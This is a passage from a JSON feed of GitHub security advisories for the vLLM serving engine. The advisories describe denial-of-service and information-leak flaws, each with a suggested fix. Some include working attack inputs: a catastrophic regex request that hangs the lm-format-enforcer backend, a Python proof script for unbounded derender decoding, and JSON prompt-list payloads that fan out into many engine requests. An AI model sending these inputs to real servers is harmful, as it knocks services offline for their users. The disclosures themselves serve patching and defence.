and **outlines** backends with `compile_regex_with_timeout` (and, for outlines, `validate_regex_is_buildable`). The **lm-format-enforcer** backend was left unguarded: it compiles the attacker-supplied regex with no timeout and no buildability check. A single request with a catastrophic regex hangs the structured-output compile step and stalls the engine worker (denial of service).\n\n### Affected code (HEAD d6d39c1)\n\n`vllm/v1/structured_output/backend_lm_format_enforcer.py`:\n- line 110: `character_level_parser = lmformatenforcer.RegexParser(grammar_spec)` — builds an `interegular` FSM from the attacker regex synchronously, **no timeout**.\n- line 155: `validate_structured_output_request_lm_format_enforcer` returns immediately on `if so_params.regex:` — **no validation**.\n\nSibling backends that WERE patched by GHSA-rwxx:\n- `backend_xgrammar.py:92` → `compile_regex_with_timeout(...)`.\n- `backend_outlines.py:65` → `compile_regex_with_timeout(...)` (plus `validate_regex_is_buildable`).\n\nlm-format-enforcer uses the same `interegular` DFA-construction primitive the advisory cites for the outlines backend.\n\n### Reproduction (runtime-verified against the sink)\n\nThe sink `lmformatenforcer.RegexParser(\u003cregex\u003e)` was exercised directly (this is exactly what the backend calls):\n\n```\nbaseline  '[0-9]{3}'          -\u003e 0.0002 s\nattacker  '(a{1,300}){300}'   -\u003e DID NOT COMPLETE in 20 s (one core pegged at 100% in interegular FSM construction)\n```\n\nEnd-to-end: start `vllm serve \u003cmodel\u003e --structured-outputs-config '{\"backend\":\"lm-format-enforcer\"}'`, then `POST /v1/completions` with `{\"structured_outputs\":{\"regex\":\"(a{1,300}){300}\"}, ...}`. The request never returns; because grammar compile runs in the engine's structured-output path, concurrent requests stall = worker-level DoS. The identical request against the outlines backend is bounded by `compile_regex_with_timeout` and returns a clean error.\n\n### Impact\n\nUnauthenticated denial of service (vLLM ships with no authentication by default). One request pegs a CPU core and blocks the structured-output engine path.\n\n**Reachability precondition:** the operator must have selected `backend=lm-format-enforcer` via `--structured-outputs-config` (the default is `auto` → xgrammar). This is the same opt-in tier as the outlines backend that GHSA-rwxx already covered.\n\n### Suggested remediation\n\nRoute the lm-format-enforcer regex compile (`backend_lm_format_enforcer.py:110`) through the same `compile_regex_with_timeout` guard already applied to the xgrammar and outlines backends, and reject un-buildable / oversized patterns in `validate_structured_output_request_lm_format_enforcer`.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-09-04T21:37:00.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-48jh-3gj7-fg8v","https://nvd.nist.gov/vuln/detail/CVE-2026-73556","https://github.com/vllm-project/vllm/pull/47595","https://github.com/vllm-project/vllm/commit/c9a788eedc412acceaa5112e0d44624b49841577","https://github.com/vllm-project/vllm/releases/tag/v0.26.0","https://github.com/advisories/GHSA-48jh-3gj7-fg8v"],"source_kind":"github","identifiers":["GHSA-48jh-3gj7-fg8v","CVE-2026-73556"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-04T22:00:09.641Z","updated_at":"2026-09-30T09:00:40.478Z","epss_percentage":0.00515,"epss_percentile":0.41579,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00OGpoLTNnajctZmc4ds4ABsdv","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00OGpoLTNnajctZmc4ds4ABsdv","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.26.0","vulnerable_version_range":"\u003c 0.26.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00OGpoLTNnajctZmc4ds4ABsdv/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1od3JtLWM0Y3gtcmY0as4ABsdu","url":"https://github.com/advisories/GHSA-hwrm-c4cx-rf4j","title":"vLLM: Unauthenticated Internal Path and Username Disclosure via Validation Error Messages","description":"## Summary\n\nWhen the vLLM API receives a malformed request (e.g., invalid JSON or missing required fields), FastAPI raises a Pydantic `RequestValidationError`. The `validation_exception_handler` in `vllm/entrypoints/openai/server_utils.py` converts this exception to a string via `str(exc)`, which includes the internal file path and line number of the handler function. The existing `sanitize_message()` function in `vllm/entrypoints/utils.py` strips memory addresses (e.g., `0x7f...`) but does not strip `File \"...\", line X` patterns. The result is a user-facing HTTP response that leaks internal system information.\n\n## Impact\n\nAn unauthenticated attacker can extract the following with a single malformed request:\n\n- **OS username** running the vLLM process (e.g., `ubuntu`)\n- **Home directory path** (e.g., `/home/ubuntu/`)\n- **Virtual environment path** (e.g., `vllm-env/`)\n- **Python version** (e.g., `3.12`)\n- **Internal package structure and line numbers** (e.g., `vllm/entrypoints/openai/chat_completion/api_router.py`)\n- **Handler function names per endpoint**, enabling precise version fingerprinting\n\nThis information aids attackers in constructing targeted exploits: environment paths narrow the attack surface, and handler function names + line numbers enable exact version identification even when the `/version` endpoint is disabled.\n\nAll POST endpoints that accept JSON bodies are affected, including `/v1/chat/completions`, `/v1/completions`, `/tokenize`, and `/detokenize`.\n\n## Workarounds\n\nDeploying vLLM behind a reverse proxy that rewrites error response bodies to strip file paths would mitigate this, though it is fragile.\n\n## Remediation Recommendation\n\nTwo possible fixes (either suffices):\n\n**Option A — Fix `validation_exception_handler`:** Construct the error message from `exc.errors()` (the structured Pydantic error list) rather than `str(exc)`. This avoids the traceback-style string entirely.\n\n**Option B — Fix `sanitize_message`:** Add a regex to strip `File \"...\", line \\d+` patterns, similar to how memory addresses are already stripped:\n\n```python\nimport re\nmsg = re.sub(r'File \".*?\", line \\d+, in \\w+', '[internal]', msg)\n```\n\nOption A is preferred as it addresses the root cause rather than filtering symptoms.\n\n## Environment Tested\n\n- vLLM 0.20.1 (pip install, latest stable as of May 2026)\n- Python 3.12\n- Ubuntu 22.04\n- Model: Qwen/Qwen2-0.5B (text-only; bug is model-independent)\n\nThis was fixed here: https://github.com/vllm-project/vllm/commit/e87521626f","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-09-04T21:36:33.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-hwrm-c4cx-rf4j","https://nvd.nist.gov/vuln/detail/CVE-2026-73555","https://github.com/vllm-project/vllm/pull/46415","https://github.com/vllm-project/vllm/commit/e87521626febe2763f997691d1599de4175f4324","https://github.com/vllm-project/vllm/releases/tag/v0.26.0","https://github.com/advisories/GHSA-hwrm-c4cx-rf4j"],"source_kind":"github","identifiers":["GHSA-hwrm-c4cx-rf4j","CVE-2026-73555"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-04T22:00:09.641Z","updated_at":"2026-10-04T01:00:38.984Z","epss_percentage":0.00413,"epss_percentile":0.33228,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1od3JtLWM0Y3gtcmY0as4ABsdu","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1od3JtLWM0Y3gtcmY0as4ABsdu","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.26.0","vulnerable_version_range":"\u003c 0.26.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1od3JtLWM0Y3gtcmY0as4ABsdu/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04NzM3LXF4NTItaGpmZs4ABsdt","url":"https://github.com/advisories/GHSA-8737-qx52-hjff","title":"vLLM: Derender endpoints decode caller-supplied GenerateResponse token IDs without output bounds","description":"## Summary\n\nThe `/v1/completions/derender` and `/v1/chat/completions/derender` endpoints accept caller-supplied `GenerateResponse` objects and postprocess every nested `choices[*].token_ids` list directly. Unlike the normal render/generate path, derender does not enforce model context length, resolved `max_tokens`, `max_num_seqs`, choice-count, or response-size bounds before detokenizing and returning the supplied token IDs. An authenticated API client can therefore make the CPU-only render frontend, or any server exposing these `/v1` derender routes, spend CPU and memory proportional to attacker-chosen generated-output-shaped JSON rather than to a bounded generation result.\n\n## Technical Details\n\nThe render router registers `/v1/chat/completions/derender` and `/v1/completions/derender` in `vllm/entrypoints/serve/render/api_router.py`, and the OpenAI API server attaches this router whenever `\"generate\"` or `\"render\"` is in `supported_tasks` (`vllm/entrypoints/openai/api_server.py`). The routes are under `/v1`, so they are part of the OpenAI-compatible HTTP API surface and are protected by the API-key middleware when `--api-key` is configured.\n\nThe request types trust generated-output-shaped data from the client. In `vllm/entrypoints/serve/disagg/protocol.py`, `GenerateResponseChoice` accepts `token_ids: list[int] | None = None`, `GenerateResponse` accepts `choices: list[GenerateResponseChoice]`, and `DerenderCompletionRequest` accepts `generate_responses: list[GenerateResponse]`. These fields have no max length, max item count, or relationship to a prior `GenerateRequest`.\n\nThe sink is `OnlineDerenderer`. `derender_completion()` iterates every supplied `generate_responses` entry and every nested choice, calls `tokenizer.decode(choice.token_ids, skip_special_tokens=True)`, appends the decoded text to the response choices, and increments `total_completion_tokens` from the same supplied list length. `derender_chat()` has the same shape for a single supplied `generate_response`, and can also feed the decoded text into tool/reasoning parsers when a parser and `chat_request` are present. `ServingRender.derender_completion_response()` calls `online_derenderer.derender_completion(request.generate_responses, request.prompt_tokens)` before applying any completion-level validation beyond the model check.\n\nNormal render and generation paths derive output limits from `max_model_len`, the rendered prompt length, request `max_tokens` / `max_completion_tokens`, and scheduler limits. Derender bypasses that invariant because it accepts the already-generated output shape directly from the HTTP caller. The missing invariant is: derender should only postprocess bounded generated output, and client-supplied derender payloads must be rejected if their nested generated token/logprob structures exceed the same limits that generation would have enforced.\n\n## PoV\n\nThe following bounded PoV can be run from a current vLLM checkout containing PR `#43606`. It asserts the current source facts for the derender routes, unchecked request fields, and decode sink, then simulates the same derender loop with a counting tokenizer. The negative control is a one-choice, 32-token response. The amplified payload keeps the test bounded but demonstrates that all decoded work and returned text scale directly with caller-supplied `GenerateResponse` contents.\n\n```python\n#!/usr/bin/env python3\nimport subprocess\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nSOURCE = Path(\".\")\n\ndef require_source_fact(path: str, needles: list[str]) -\u003e None:\n    text = (SOURCE / path).read_text()\n    missing = [needle for needle in needles if needle not in text]\n    if missing:\n        raise AssertionError(f\"{path} missing expected facts: {missing}\")\n\ndef source_head() -\u003e str:\n    return subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"], cwd=SOURCE, text=True).strip()\n\n@dataclass\nclass Choice:\n    index: int\n    token_ids: list[int]\n\n@dataclass\nclass GenerateResponse:\n    request_id: str\n    choices: list[Choice]\n\nclass CountingTokenizer:\n    def __init__(self) -\u003e None:\n        self.decode_calls = 0\n        self.decoded_ids = 0\n    def decode(self, token_ids: list[int], *, skip_special_tokens: bool = True) -\u003e str:\n        self.decode_calls += 1\n        self.decoded_ids += len(token_ids)\n        return \"x\" * len(token_ids)\n\ndef derender_completion_like_current_head(generate_responses: list[GenerateResponse], tokenizer: CountingTokenizer) -\u003e tuple[int, int, int]:\n    output_chars = 0\n    choices = 0\n    total_completion_tokens = 0\n    for gen in generate_responses:\n        for choice in gen.choices:\n            if not choice.token_ids:\n                raise ValueError(\"choice has empty or null token_ids\")\n            decoded_text = tokenizer.decode(choice.token_ids, skip_special_tokens=True)\n            output_chars += len(decoded_text)\n            total_completion_tokens += len(choice.token_ids)\n            choices += 1\n    return choices, total_completion_tokens, output_chars\n\ndef make_payload(responses: int, choices_per_response: int, tokens_per_choice: int) -\u003e list[GenerateResponse]:\n    token_ids = [42] * tokens_per_choice\n    return [GenerateResponse(request_id=f\"gen-{r}\", choices=[Choice(index=c, token_ids=list(token_ids)) for c in range(choices_per_response)]) for r in range(responses)]\n\ndef run_case(name: str, payload: list[GenerateResponse]) -\u003e None:\n    tokenizer = CountingTokenizer()\n    choices, completion_tokens, output_chars = derender_completion_like_current_head(payload, tokenizer)\n    print(f\"{name}: responses={len(payload)} choices={choices} decode_calls={tokenizer.decode_calls} decoded_token_ids={tokenizer.decoded_ids} completion_tokens={completion_tokens} output_chars={output_chars}\")\n\nrequire_source_fact(\"vllm/entrypoints/serve/render/api_router.py\", ['\"/v1/completions/derender\"', '\"/v1/chat/completions/derender\"', \"app.include_router(router)\"])\nrequire_source_fact(\"vllm/entrypoints/serve/disagg/protocol.py\", [\"class GenerateResponseChoice(BaseModel):\", \"token_ids: list[int] | None = None\", \"class GenerateResponse(BaseModel):\", \"choices: list[GenerateResponseChoice]\", \"class DerenderCompletionRequest(BaseModel):\", \"generate_responses: list[GenerateResponse]\"])\nrequire_source_fact(\"vllm/renderers/online_derenderer.py\", [\"async def derender_completion(\", \"for gen, pt in zip(generate_responses, prompt_tokens_list):\", \"for choice in gen.choices:\", \"decoded_text = tokenizer.decode(\", \"total_completion_tokens += len(choice.token_ids)\"])\nprint(\"source_checks=ok\")\nprint(f\"source_head={source_head()}\")\nrun_case(\"negative_control\", make_payload(responses=1, choices_per_response=1, tokens_per_choice=32))\nrun_case(\"amplified_payload\", make_payload(responses=16, choices_per_response=4, tokens_per_choice=8192))\nprint(\"observation=derender decodes every caller-supplied token id before any max_model_len, max_tokens, max_num_seqs, or response-size check\")\n```\n\n\n## Impact\n\nAn attacker with access to the `/v1` API can send derender requests that consume CPU and memory in the frontend/postprocessing process and can cause large responses unrelated to any bounded generation. In disaggregated deployments, this affects the CPU-only render frontend; in servers where the render router is attached alongside generation, it affects the same OpenAI-compatible server process that handles normal client traffic. This can degrade availability for other clients sharing the process.\n\nLikely CWE: CWE-400 (Uncontrolled Resource Consumption) / CWE-770 (Allocation of Resources Without Limits or Throttling). Conservative CVSS v3.1: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L` (4.3). This is not Low severity because a regular network API client can induce availability impact in a shared service without local access, invalid model artifacts, or special runtime privileges. If the server is deployed without API-key enforcement for `/v1`, the privileges component becomes `PR:N`.\n\n## Suggested Fix\n\nValidate derender payloads before any detokenization or parser invocation. Apply bounded limits to `generate_response(s)`, `choices`, `token_ids`, `prompt_logprobs`, `logprobs.content`, `top_logprobs`, and `routed_experts` that are at least as strict as the corresponding generation-side limits. For completions, reject `generate_responses` counts above the number of prompts that `/v1/completions/render` would have produced, and reject total nested choice counts above `max_num_seqs` / `n` limits. For each choice, reject `token_ids` longer than the resolved output-token budget, or require derender callers to submit the original bounded `GenerateRequest` / sampling metadata and validate the `GenerateResponse` against it before decoding.\n\nAdd regression tests for both derender endpoints. The tests should show that a normal bounded derender payload succeeds, while oversized `generate_responses`, oversized `choices`, oversized `token_ids`, and oversized logprob/top-logprob structures are rejected before `tokenizer.decode()` or parser execution.\n\n## Affected Package/Versions\n\nConfirmed affected: current main at `ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a` and downstream/nightly builds that include the derender endpoints introduced by PR `#43606`. The derender router, request models, decode sink, render serving bridge, and OpenAI API router attachment have no relevant diff from `00e045b7c7b82599f626779e111233abd4d0a64e` to `ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a`.\n\nLatest release checked: `v0.23.0`, published on `2026-06-15`. Its `vllm/entrypoints/serve/render/api_router.py` does not expose `/v1/completions/derender` or `/v1/chat/completions/derender`, so `v0.23.0` was not confirmed affected.\n\n## Advisory History\n\nPR `#43606` (\"[Render] Add `/derender` endpoints for disaggregated postprocessing\") introduced the derender endpoints on main. PR `#44285` later refactored the render serving code, and current head still contains the unchecked derender flow.\n\nPublic issue search for `derender GenerateResponse token_ids` returned no reports. Public search for `\"/v1/completions/derender\"` returned the derender feature RFC `#42729` and unrelated bugs, but no size-bound, DoS, or generated-output postprocessing issue.\n\nRelated public request-fanout and resource-bound advisories are distinct:\n\n- `GHSA-3mwp-wvh9-7528` covers an unbounded `n` parameter on the normal OpenAI completion/chat generation routes. Its root cause is missing upper-bound validation for generated sequence count, its sink is request fanout and request-object copying into the async engine path before scheduling, its precondition is a caller-controlled `n`, and its fix surface is a cap on generated sequence count. This report reaches `/v1/completions/derender` and `/v1/chat/completions/derender`, not the normal generate routes; its root cause is unchecked caller-supplied `GenerateResponse` / `choices` / `token_ids` structures, its sink is `OnlineDerenderer` detokenization and response construction after generation, its precondition is access to the derender API with generated-output-shaped JSON, and its fix surface is derender payload validation before decode.\n- PR `#45390` includes the `GHSA-83mh-6mwq-3hg9` batch-message fanout fix class: it bounds the outer `BatchChatCompletionRequest.messages` conversation list to prevent one request from creating many conversation/request objects before normal generation. This report has no batch conversation list and does not rely on `n`; one derender request can instead supply oversized nested `GenerateResponse` choices and token IDs that are detokenized and returned directly. A batch-message `max_length` limit would not bound derender `generate_response(s)` or per-choice token/logprob structures.\n\nThe completed local report titled \"Explicit truncation_side disables tokenizer-level prompt truncation\" is also distinct. That report used `/v1/completions` and `/v1/chat/completions` with ordinary prompt text plus `truncate_prompt_tokens` and explicit `truncation_side`; its root cause was the renderer omitting tokenizer-level `max_length` and the pre-tokenization character guard before post-token slicing; its sink was prompt tokenization; and its fix surface was preserving tokenizer-level truncation or rejecting over-budget prompts before tokenization. This derender report uses `/v1` derender routes, has no prompt text tokenization or truncation-side control, starts from caller-supplied generated-output token IDs, and needs aggregate bounds on derender `generate_response(s)`, choices, token IDs, logprobs, parser inputs, and response construction before detokenization.\n\nOther adjacent vLLM advisories for Rust/gRPC token-id and logprob bounds, structured-output grammar amplification, repetition-detection windows, and pooling/rerank batch fanout are distinct. Those issues affect Rust/gRPC request conversion, grammar compilation, scheduler loops, or engine fanout. This issue affects `/v1` derender postprocessing of caller-supplied generated-output objects and requires derender-specific request validation before detokenization.\n\n## Resources\n\n- `vllm/entrypoints/serve/render/api_router.py`\n- `vllm/entrypoints/serve/disagg/protocol.py`\n- `vllm/renderers/online_derenderer.py`\n- `vllm/entrypoints/serve/render/serving.py`\n- `vllm/entrypoints/openai/api_server.py`\n- PR `#43606`: `https://github.com/vllm-project/vllm/pull/43606`\n- PR `#44285`: `https://github.com/vllm-project/vllm/pull/44285`\n- `GHSA-3mwp-wvh9-7528`: `https://github.com/vllm-project/vllm/security/advisories/GHSA-3mwp-wvh9-7528`\n- PR `#45390`: `https://github.com/vllm-project/vllm/pull/45390`\n- Release `v0.23.0`: `https://github.com/vllm-project/vllm/releases/tag/v0.23.0`","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-09-04T21:32:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-8737-qx52-hjff","https://nvd.nist.gov/vuln/detail/CVE-2026-71486","https://github.com/vllm-project/vllm/pull/47260","https://github.com/vllm-project/vllm/commit/8e61b646e2d157f9b93451fa048f9c8530c8a67b","https://github.com/vllm-project/vllm/releases/tag/v0.26.0","https://github.com/advisories/GHSA-8737-qx52-hjff"],"source_kind":"github","identifiers":["GHSA-8737-qx52-hjff","CVE-2026-71486"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-04T22:00:09.641Z","updated_at":"2026-10-04T01:00:38.985Z","epss_percentage":0.00374,"epss_percentile":0.29007,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NzM3LXF4NTItaGpmZs4ABsdt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04NzM3LXF4NTItaGpmZs4ABsdt","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.26.0","vulnerable_version_range":"\u003c 0.26.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NzM3LXF4NTItaGpmZs4ABsdt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04N3g1LXZtYzMtNzU2as4ABish","url":"https://github.com/advisories/GHSA-87x5-vmc3-756j","title":"vLLM: Completion prompt lists fan out into unbounded engine requests","description":"## Summary\n\nThe `/v1/completions` request model accepts `prompt` as a list of text prompts or a list of token-id prompts without any outer prompt-count bound. The serving path turns each element into a separate engine input, creates one engine generator per element, merges all generators, and allocates a response slot per prompt. An authenticated API client can therefore turn one request into an attacker-chosen number of backend subrequests before any aggregate request-count budget is enforced.\n\n## Technical Details\n\n`CompletionRequest.prompt` allows both list-shaped prompt inputs and scalar prompts:\n\n```python\n# vllm/entrypoints/openai/completion/protocol.py\nprompt: (\n    list[Annotated[int, Field(ge=0)]]\n    | list[list[Annotated[int, Field(ge=0)]]]\n    | str\n    | list[str]\n    | None\n) = None\n```\n\nThe validator only requires some prompt-like input to be present:\n\n```python\ndef validate_prompt_and_prompt_embeds(cls, data):\n    prompt = data.get(\"prompt\")\n    prompt_embeds = data.get(\"prompt_embeds\")\n    ...\n    if prompt_is_empty and embeds_is_empty:\n        raise VLLMValidationError(...)\n```\n\nThe renderer then expands list-shaped prompts as a sequence. `prompt_to_seq()` wraps a scalar string or a single token-id list, but returns a `list[str]` or `list[list[int]]` unchanged:\n\n```python\n# vllm/renderers/inputs/preprocess.py\ndef prompt_to_seq(prompt_or_prompts):\n    if isinstance(prompt_or_prompts, (dict, str, bytes)) or (\n        len(prompt_or_prompts) \u003e 0 and is_list_of(prompt_or_prompts, int)\n    ):\n        return [prompt_or_prompts]\n\n    return prompt_or_prompts\n```\n\n`OnlineRenderer.preprocess_completion()` appends that whole sequence, and the renderer processes every element:\n\n```python\n# vllm/renderers/online_renderer.py\nprompts = list[SingletonPrompt | bytes]()\nif prompt_input is not None:\n    prompts.extend(prompt_to_seq(prompt_input))\n...\nparsed_prompts = [\n    prompt if isinstance(prompt, bytes) else parse_model_prompt(model_config, prompt)\n    for prompt in prompts\n]\nreturn await renderer.render_cmpl_async(parsed_prompts, tok_params, ...)\n```\n\nFinally, completion serving creates one backend generator and one response slot per rendered prompt:\n\n```python\n# vllm/entrypoints/openai/completion/serving.py\ngenerators: list[AsyncGenerator[RequestOutput, None]] = []\nfor i, engine_input in enumerate(engine_inputs):\n    ...\n    generator = self.engine_client.generate(...)\n    generators.append(generator)\n\nresult_generator = merge_async_iterators(*generators)\nnum_prompts = len(engine_inputs)\n...\nfinal_res_batch: list[RequestOutput | None] = [None] * num_prompts\n```\n\nThe violated invariant is that one HTTP request should have a bounded backend request count. Current code enforces per-prompt token and sampling limits, but not the number of prompts in the outer completion request.\n\n## PoV\n\nA minimal oversized request keeps normal generation parameters small but supplies a large outer prompt list:\n\n```json\n{\n  \"model\": \"served-model\",\n  \"prompt\": [\"x\", \"x\", \"x\"],\n  \"max_tokens\": 1,\n  \"n\": 1\n}\n```\n\nScaling the `prompt` array to tens or hundreds of thousands of short entries makes the server allocate, preprocess, schedule, merge, and buffer one subrequest per entry. The same applies to token-id prompt lists:\n\n```json\n{\n  \"model\": \"served-model\",\n  \"prompt\": [[1], [1], [1]],\n  \"max_tokens\": 1,\n  \"n\": 1\n}\n```\n\nThe intended negative control is a scalar prompt:\n\n```json\n{\n  \"model\": \"served-model\",\n  \"prompt\": \"x\",\n  \"max_tokens\": 1,\n  \"n\": 1\n}\n```\n\nThe scalar string is wrapped as one prompt; the list form is not bounded and fans out by list length.\n\n\n## Impact\n\nAn authenticated API client can make one `/v1/completions` request consume CPU, memory, async task scheduling, engine request slots, and response buffering proportional to an attacker-chosen outer prompt list. This can starve or disrupt other tenants sharing the same vLLM server. The report does not claim unauthenticated access, confidentiality impact, integrity impact, code execution, or impact where `/v1/completions` is not reachable by untrusted or semi-trusted clients.\n\n## Suggested Fix\n\nReject oversized prompt lists before renderer preprocessing. Add an outer prompt-count limit to `CompletionRequest.prompt` when the prompt is `list[str]` or `list[list[int]]`, and consider making the limit configurable in the same style as the batch-chat and sampling-list bounds. The check should run before `OnlineRenderer.preprocess_completion()` expands the prompt sequence, so oversized requests do not allocate parsed prompt lists, async render/tokenization tasks, engine generators, or response result slots.\n\nRegression coverage should include a scalar prompt, a bounded prompt list, an oversized `list[str]`, and an oversized `list[list[int]]`. The oversized requests should fail with a controlled validation error before any backend generator is created.\n\n## Affected Package/Versions\n\nPackage ecosystem: pip\n\nPackage name: `vllm`\n\nAffected range confirmed by source proof: `\u003e=0.19.0, \u003c=0.24.0`; current `main` at `cbe9c40f998f13975b967773ac7e7920e115387f` remains affected.\n\nPatched versions: unknown.\n\nLatest release checked: `v0.24.0`, published on 2026-06-29.\n\n## GitHub Advisory Metadata\n\nPackage ecosystem: pip\n\nPackage name: `vllm`\n\nVulnerable version range: `\u003e=0.19.0, \u003c=0.24.0`\n\nPatched versions: unknown\n\n## Advisory History\n\nPublic issue and PR searches for `CompletionRequest prompt list`, `\"prompt\" \"list[str]\" \"completion\"`, and `\"CompletionRequest\" \"max_length\"` did not find an existing report or fix for this exact path.\n\nThe closest published advisory is `GHSA-3mwp-wvh9-7528`, \"OOM Denial of Service via Unbounded `n` Parameter in OpenAI API Server\", patched in `0.19.0`. This report is distinct because it keeps `n=1` and uses the `/v1/completions` `prompt` outer list to create one engine request per prompt. The fix invariant is an outer prompt-count and aggregate request budget, not only a generated-sequence-count cap.\n\nThe closest public PR is `vllm-project/vllm#45390`, which covers multiple DoS fixes including `GHSA-83mh-6mwq-3hg9` for `BatchChatCompletionRequest.messages`. That PR adds an outer bound to batch chat conversations, but its diff does not touch `vllm/entrypoints/openai/completion/protocol.py` or `vllm/entrypoints/openai/completion/serving.py`.\n\nPrior local/private report families checked included pooling/rerank batch fanout, derender token-id postprocessing, explicit `truncation_side` tokenizer-limit bypass, Python disaggregated generate prompt-length bypass, and priority scheduling. Those reports differ by endpoint, attacker-controlled field, sink, and fix surface.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-13T18:40:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-87x5-vmc3-756j","https://nvd.nist.gov/vuln/detail/CVE-2026-73559","https://github.com/vllm-project/vllm/pull/47845","https://github.com/vllm-project/vllm/commit/675f4295cdfe0d870471c2b51bfeca3a68a9569e","https://github.com/vllm-project/vllm/releases/tag/v0.26.0","https://github.com/advisories/GHSA-87x5-vmc3-756j"],"source_kind":"github","identifiers":["GHSA-87x5-vmc3-756j","CVE-2026-73559"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-13T19:00:08.488Z","updated_at":"2026-09-30T09:01:09.053Z","epss_percentage":0.00583,"epss_percentile":0.45716,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04N3g1LXZtYzMtNzU2as4ABish","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04N3g1LXZtYzMtNzU2as4ABish","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.26.0","vulnerable_version_range":"\u003e= 0.19.0, \u003c 0.26.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04N3g1LXZtYzMtNzU2as4ABish/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zM2NnLWd4djgtM3A4Z84ABcPt","url":"https://github.com/advisories/GHSA-33cg-gxv8-3p8g","title":"vLLM denial of service via prompt embeds on M-RoPE models","description":"### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server._\n\nSending a pure prompt embeds payload in a `/v1/completions` request with a model using M-RoPE causes the EngineCore to fail an assertion and fatally crash, shutting down the entire server application.\n\nAny remote user who is authorized to make a `/v1/completions` endpoint can trivially make such a request and induce a crash.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nIn commit [56669c1](https://github.com/vllm-project/vllm/commit/56669c1f293d5c53b6a19ddf2f78802fa9fff2c2), a simple assert intended to be a type-narrowing assert was added to the `_init_mrope_positions` method in `GPUModelRunner` (the offending line on main at the time of writing: https://github.com/vllm-project/vllm/blob/2d481f8a946ee0521872af0f098674a8ee01ce4a/vllm/v1/worker/gpu_model_runner.py#L1588-L1607).\n\n```python\nassert req_state.prompt_token_ids is not None, (\n            \"M-RoPE requires prompt_token_ids to be available.\"\n        )\n```\n\nThis type narrowing assert is to prevent mypy errors later in the function because `None` is not a valid type for `mrope_model.get_mrope_input_positions`. Unfortunately, this assertion is not always true. `/v1/completions` requests that specify `prompt=None` and `prompt_embeds=\u003cnot none\u003e` will indeed create a CachedRequestState where `prompt_token_ids` is `None`. This triggers the assertion, which in turn crashes the EngineCore and the Server application.\n\n```\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167]   File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_model_runner.py\", line 3997, in execute_model\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167]     deferred_state_corrections_fn = self._update_states(scheduler_output)\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167]                                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167]   File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_model_runner.py\", line 1239, in _update_states\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167]     self._init_mrope_positions(req_state)\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167]   File 